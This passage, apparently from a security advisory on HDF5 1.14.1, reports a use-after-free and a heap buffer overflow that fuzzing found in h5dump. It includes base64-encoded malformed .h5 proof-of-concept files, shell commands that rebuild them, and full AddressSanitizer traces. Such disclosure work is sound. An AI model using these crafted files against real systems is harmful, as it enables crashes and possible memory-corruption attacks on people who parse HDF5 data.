#28 0x7f791079861a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
#29 0x558ffe8e2be4 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
#30 0x558ffe8db1c7 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
#31 0x7f79100afd09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)
previously allocated by thread T0 here:
#0 0x7f7910f06e8f in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x7f79106b02ef in H5FL__malloc /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5FL.c:237
#2 0x7f79106b14f3 in H5FL_blk_malloc /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5FL.c:888
#3 0x7f7910590dd4 in H5D__typeinfo_init_phase3 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:1468
#4 0x7f791059341b in H5D__typeinfo_init_phase3 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:424
#5 0x7f791059341b in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:305
#6 0x7f7910b48ee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
#7 0x7f7910b18afc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
#8 0x7f7910b18afc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
#9 0x7f7910507a0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
#10 0x7f791050f444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
#11 0x558ffe91546c (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
#12 0x558ffe92a18d (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
#13 0x558ffe8e3c9f (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
#14 0x558ffe8ec947 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
#15 0x7f79106f214e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
#16 0x7f79106f214e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
#17 0x7f7910703212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
#18 0x7f791047d721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
#19 0x7f791048105e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
#20 0x7f7910711c79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
#21 0x7f791070a3d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
#22 0x7f79106f4d71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
#23 0x7f79107acc0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
#24 0x7f7910b54455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
#25 0x7f7910b2b095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
#26 0x7f7910b2b095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
#27 0x7f791079861a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
#28 0x7f791079861a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
#29 0x558ffe8e2be4 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
#30 0x558ffe8db1c7 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
#31 0x7f79100afd09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)
SUMMARY: AddressSanitizer: heap-use-after-free ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789 in __interceptor_memmove
Shadow bytes around the buggy address:
0x0fefa15020b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0fefa15020c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0fefa15020d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0fefa15020e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0fefa15020f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0fefa1502100: fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd
0x0fefa1502110: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0fefa1502120: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0fefa1502130: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0fefa1502140: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0fefa1502150: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==1205==ABORTING
H5T__conv_struct Use After Free
Details
The following heap-use-after-free was found by fuzzing the h5dump helper utility. An attacker who can supply a malicious h5 file can trigger a heap use-after-free. The freed object is referenced in a memmove call from H5T__conv_struct. The original object was allocated by H5D__typeinfo_init_phase3 and freed by H5D__typeinfo_term.
PoC
The following PoC shows the ASAN output detailing the use-after-free condition.
$ echo "H4sICP8/v2QAAzExMDQ5YTU2YTQyMzUwOTNlNjg0NWEyNzAyMWFmMTVlAOv0cHHj5ZLiYgABDg4GFgYBBmYGBPgPBRIcqHyY/A4mJMUMTxnQgYerYwCINoDyFaB0AxuGUqj5EDokyNWVgYERbh+6vRasEJoDuzHopn4mStmgAPX4JNnp5Qp08J+wEroCRgYmBkYWRHoSBKZbRiA9A8pPwFDPBpLnACsCAgEgBIEN0HSYwQhTBxFnhPL/MUBihA8qbmQABKaGloamJiamhiADJcBGMjKByAf/f0AzDyhDQdw2gXLP4gCYuY1c8MHescEYSJ84BMROAY3M0GBqsIfIP7B3mo2QN5huzADJ9g0OoWBw1d4ZzIfIg+QgwSDgCNF/wd4FSR4U5CwQ/Y6zZoLASXtXNP2Q7H3CEWL+UXs3JHkQCxJtAk6TVDyB6JC9O0w+5YQTyG5IRnFxgth/wN4DIm8Lsx9SbjQ4yRwvBKI99p5o9nOC+YucIO7bae+FJK8JLH6C/fxdGIGhBCt/XqCUg1QEDTQyl86An4C8Y1FRYqV/WnBJUWlySWlRajFUHJoNobkPlK4SwFlTDJiAgJHJkBifl5ibSth+AW1YmlNgSILqYSGgR1BBHq5HnINBHFQOJEP1Eqp3BBXsoWocGEy4GUxFgYkyBapXAF2xPAqPUQyYlnhAdmUkFqF6D38pLAzS3AUME1BYAjXCAg/kB0YkdeCkWo8wS1BeHmwfsj8BV7IhBxgIAAA=" | base64 -d | gunzip -c > 11049a56a4235093e6845a27021af15e
$ ./hdf5/bin/h5dump 11049a56a4235093e6845a27021af15e
HDF5 "11049a56a4235093e6845a27021af15e" {
GROUP "/" {
DATASET "ArrayOfStructures" {
DATATYPE H5T_COMPOUND {
32-bit big-endian integer 32-bit precision "a_name";
H5T_IEEE_F32LE "b_name";
64-bit little-endian floating-point 64-bit precision "c_name";
H5T_COMPOUND {
H5T_STRING {
STRSIZE 35329;
STRPAD H5T_STR_NULLTERM;
CSET H5T_CSET_ASCII;
CTYPE H5T_C_S1;
} "char_name";
H5T_ARRAY { [2] 96-bit big-endian floating-point 32-bit precision } "array_na";
} "d_name";
}
DATASPACE SIMPLE { ( 545460846846 ) / ( 545460846846 ) }
=================================================================
==1167==ERROR: AddressSanitizer: heap-use-after-free on address 0x7fae4edbcec4 at pc 0x7fae5549f541 bp 0x7fffb9b82400 sp 0x7fffb9b81bb0
READ of size 35329 at 0x7fae4edbcec4 thread T0
#0 0x7fae5549f540 in __interceptor_memmove ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789
#1 0x7fae54ff94dd in H5T__conv_struct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2314
#2 0x7fae54fc687a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
#3 0x7fae54ff9b02 in H5T__conv_struct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2339
#4 0x7fae54fc687a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
#5 0x7fae54ba8b3b in H5D__scatgath_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dscatgath.c:545
#6 0x7fae54b66221 in H5D__contig_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dcontig.c:870
#7 0x7fae54b9c5d7 in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:380
#8 0x7fae55151ee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
#9 0x7fae55121afc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
#10 0x7fae55121afc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
#11 0x7fae54b10a0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
#12 0x7fae54b18444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
#13 0x55beb9eaf46c (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
#14 0x55beb9ec418d (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
#15 0x55beb9e7dc9f (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
#16 0x55beb9e86947 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
#17 0x7fae54cfb14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
#18 0x7fae54cfb14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
#19 0x7fae54d0c212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
#20 0x7fae54a86721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
#21 0x7fae54a8a05e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
#22 0x7fae54d1ac79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
#23 0x7fae54d133d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
#24 0x7fae54cfdd71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
#25 0x7fae54db5c0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
#26 0x7fae5515d455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
#27 0x7fae55134095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
#28 0x7fae55134095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
#29 0x7fae54da161a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
#30 0x7fae54da161a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
#31 0x55beb9e7cbe4 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
#32 0x55beb9e751c7 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
#33 0x7fae546b8d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)
#34 0x55beb9e77649 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x23649)
0x7fae4edbcec4 is located 800452 bytes inside of 1048584-byte region [0x7fae4ecf9800,0x7fae4edf9808)
freed by thread T0 here:
#0 0x7fae5550fb6f in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:123
#1 0x7fae54cb7d3e in H5FL__blk_gc_list /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5FL.c:1203
#2 0x7fae54cb9b07 in H5FL_blk_free /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5FL.c:1067
#3 0x7fae54b9aaa7 in H5D__typeinfo_term /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:1505
#4 0x7fae54b9aaa7 in H5D__typeinfo_term /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:1494
#5 0x7fae54b9aaa7 in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:430
#6 0x7fae55151ee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
#7 0x7fae55121afc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
#8 0x7fae55121afc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
#9 0x7fae54b10a0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
#10 0x7fae54b18444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
#11 0x55beb9eaf46c (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
#12 0x55beb9ec418d (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
#13 0x55beb9e7dc9f (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
#14 0x55beb9e86947 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
#15 0x7fae54cfb14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
#16 0x7fae54cfb14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
#17 0x7fae54d0c212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
#18 0x7fae54a86721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
#19 0x7fae54a8a05e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
#20 0x7fae54d1ac79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
#21 0x7fae54d133d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
#22 0x7fae54cfdd71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
#23 0x7fae54db5c0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
#24 0x7fae5515d455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
#25 0x7fae55134095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
#26 0x7fae55134095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
#27 0x7fae54da161a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
#28 0x7fae54da161a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
#29 0x55beb9e7cbe4 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
#30 0x55beb9e751c7 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
#31 0x7fae546b8d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)
previously allocated by thread T0 here:
#0 0x7fae5550fe8f in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x7fae54cb92ef in H5FL__malloc /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5FL.c:237
#2 0x7fae54cba4f3 in H5FL_blk_malloc /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5FL.c:888
#3 0x7fae54b99dd4 in H5D__typeinfo_init_phase3 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:1468
#4 0x7fae54b9c41b in H5D__typeinfo_init_phase3 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:424
#5 0x7fae54b9c41b in H5D__read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dio.c:305
#6 0x7fae55151ee8 in H5VL__native_dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:360
#7 0x7fae55121afc in H5VL__dataset_read /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2047
#8 0x7fae55121afc in H5VL_dataset_read_direct /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2090
#9 0x7fae54b10a0b in H5D__read_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1011
#10 0x7fae54b18444 in H5Dread /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:1067
#11 0x55beb9eaf46c (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x5b46c)
#12 0x55beb9ec418d (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x7018d)
#13 0x55beb9e7dc9f (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29c9f)
#14 0x55beb9e86947 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
#15 0x7fae54cfb14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
#16 0x7fae54cfb14e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
#17 0x7fae54d0c212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
#18 0x7fae54a86721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
#19 0x7fae54a8a05e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
#20 0x7fae54d1ac79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
#21 0x7fae54d133d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
#22 0x7fae54cfdd71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
#23 0x7fae54db5c0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
#24 0x7fae5515d455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
#25 0x7fae55134095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
#26 0x7fae55134095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
#27 0x7fae54da161a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
#28 0x7fae54da161a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
#29 0x55beb9e7cbe4 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
#30 0x55beb9e751c7 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
#31 0x7fae546b8d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)
SUMMARY: AddressSanitizer: heap-use-after-free ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789 in __interceptor_memmove
Shadow bytes around the buggy address:
0x0ff649daf980: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0ff649daf990: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0ff649daf9a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0ff649daf9b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0ff649daf9c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0ff649daf9d0: fd fd fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd
0x0ff649daf9e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0ff649daf9f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0ff649dafa00: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0ff649dafa10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0ff649dafa20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==1167==ABORTING
Heap Buffer Overflow
Summary
An attacker who can control an h5 file parsed by HDF5 can trigger write-based heap buffer overflow conditions. This can lead to a denial-of-service condition, and potentially further issues such as remote code execution depending on the practical exploitability of the heap overflows against modern operating systems. Real-world exploitability of these issues in terms of remote-code execution is currently unknown.
H5T__ref_mem_setnull Heap Buffer Overflow
Details
The following write-based heap overflow was found by fuzzing the h5dump and h5stat helper utilities. An attacker who can supply a malicious h5 file can trigger an out-of-bounds write in the H5T__ref_mem_setnull method. As the H5T__ref_mem_setnull method is responsible over-writing target buffers with null bytes, the likelihood of exploitability for remote-code-execution is reduced.
PoC
The following snippet details the PoC testcase and address sanitizer output:
$ echo "H4sIAAAAAAAAA+v0cHHj5ZLiYgABDg4GFgYBBmYGBPgPBRcE4PwPID5MfgGyYizAw9UxAMxghPAjoOINaOpcEksSi1NLDPUMUPhGaHxjNL4JLj7UOoYV+J034CAkyNUV5Nr/aAAm/4AFQnvQwzH1JKpnoYkraAEUBtoBeMB/fJKMDEzgtKwA5QsC8ycjMJ4aoAk8AUM9KyTtQ+WZGSTATEkgAcrCAhywaAObqMzIAMnYjFD1sChVgYobGRgYAqGxoaWpiYkZsIiAmsfIBNXAgdAnAKY7wHwBYnxOfXAXXSDYz98FFCZQZzJcIFBeWUBpDTb86jSgdAAHXmVw8xI48auD5e8CLtxqGiAUO36TaANQ0tUbULoSADPR0hMDrvTER2R6cuBA1UcVACxPX1DTPKIBUbngPVJxTwBAQmUCuc6hGsDtZFzlj6CCPDydiHMwiNfD1VOWXgIEEPogejuo4UGqAczwUAAztRggqQPEhvkZOS9RGi4JSOECYTbQwnsEQQIaH1f6UBfCWj9RHA4k1k8U1x8SUHqg6o/R/AMCIzD/YG/f0Tv/kAqGfH7D116DggFpr5EK/v8baBdQBwAA5dxHINAQAAA=" | base64 -d | gunzip -c > 0e71c9cac751ed2550aee102e2956181
$ ./hdf5/bin/h5dump 0e71c9cac751ed2550aee102e2956181
HDF5 "0e71c9cac751ed2550aee102e2956181" {
GROUP "/" {
DATASET "Dataset1.0" {
DATATYPE H5T_STRING {
STRSIZE H5T_VARIABLE;
STRPAD H5T_STR_NULLTERM;
CSET H5T_CSET_ASCII;
CTYPE unknown_one_character_type;
}
DATASPACE SIMPLE { ( 4 ) / ( 4 ) }
DATA {h5dump error: unable to print data
}
=================================================================
==1090==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000005b40 at pc 0x7f4b61c17269 bp 0x7ffff0d71450 sp 0x7ffff0d70c00
WRITE of size 64 at 0x602000005b40 thread T0
#0 0x7f4b61c17268 in __interceptor_memset ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:778
#1 0x7f4b61881782 in H5T__ref_mem_setnull /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tref.c:394
#2 0x7f4b6177984f in H5T__conv_ref /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:3758
#3 0x7f4b6173e87a in H5T_convert /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
#4 0x7f4b6130e117 in H5D_get_create_plist /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Dint.c:3667
#5 0x7f4b618ca8a4 in H5VL__native_dataset_get /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_dataset.c:466
#6 0x7f4b6189bcfa in H5VL__dataset_get /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2426
#7 0x7f4b6189bcfa in H5VL_dataset_get /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:2457
#8 0x7f4b6128f1e6 in H5Dget_create_plist /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5D.c:776
#9 0x5568d72ae733 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x29733)
#10 0x5568d72b7947 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x32947)
#11 0x7f4b6147314e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:865
#12 0x7f4b6147314e in H5G__iterate_cb /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:838
#13 0x7f4b61484212 in H5G__node_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gnode.c:966
#14 0x7f4b611fe721 in H5B__iterate_helper /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1151
#15 0x7f4b6120205e in H5B_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5B.c:1193
#16 0x7f4b61492c79 in H5G__stab_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gstab.c:535
#17 0x7f4b6148b3d7 in H5G__obj_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gobj.c:671
#18 0x7f4b61475d71 in H5G_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Gint.c:921
#19 0x7f4b6152dc0f in H5L_iterate /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Lint.c:2246
#20 0x7f4b618d5455 in H5VL__native_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLnative_link.c:366
#21 0x7f4b618ac095 in H5VL__link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5482
#22 0x7f4b618ac095 in H5VL_link_specific /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5VLcallback.c:5516
#23 0x7f4b6151961a in H5L__iterate_api_common /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1661
#24 0x7f4b6151961a in H5Literate2 /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5L.c:1697
#25 0x5568d72adbe4 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x28be4)
#26 0x5568d72a61c7 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x211c7)
#27 0x7f4b60e30d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)
#28 0x5568d72a8649 (/home/doi/src/hdf5-1.14.1-2-ASAN/hdf5/bin/h5dump+0x23649)
0x602000005b40 is located 0 bytes to the right of 16-byte region [0x602000005b30,0x602000005b40)
allocated by thread T0 here:
#0 0x7f4b61c87e8f in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x7f4b615acf5a in H5O__fill_copy /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Ofill.c:568
#2 0x7f4b615d4882 in H5O_msg_copy /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Omessage.c:722
#3 0x7f4b615f98e5 in H5P__dcrt_fill_value_copy /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Pdcpl.c:1274
#4 0x7f4b61658c16 in H5P_copy_plist /home/doi/src/hdf5-1.14.1-2-ASAN/src/H5Pint.c:1004
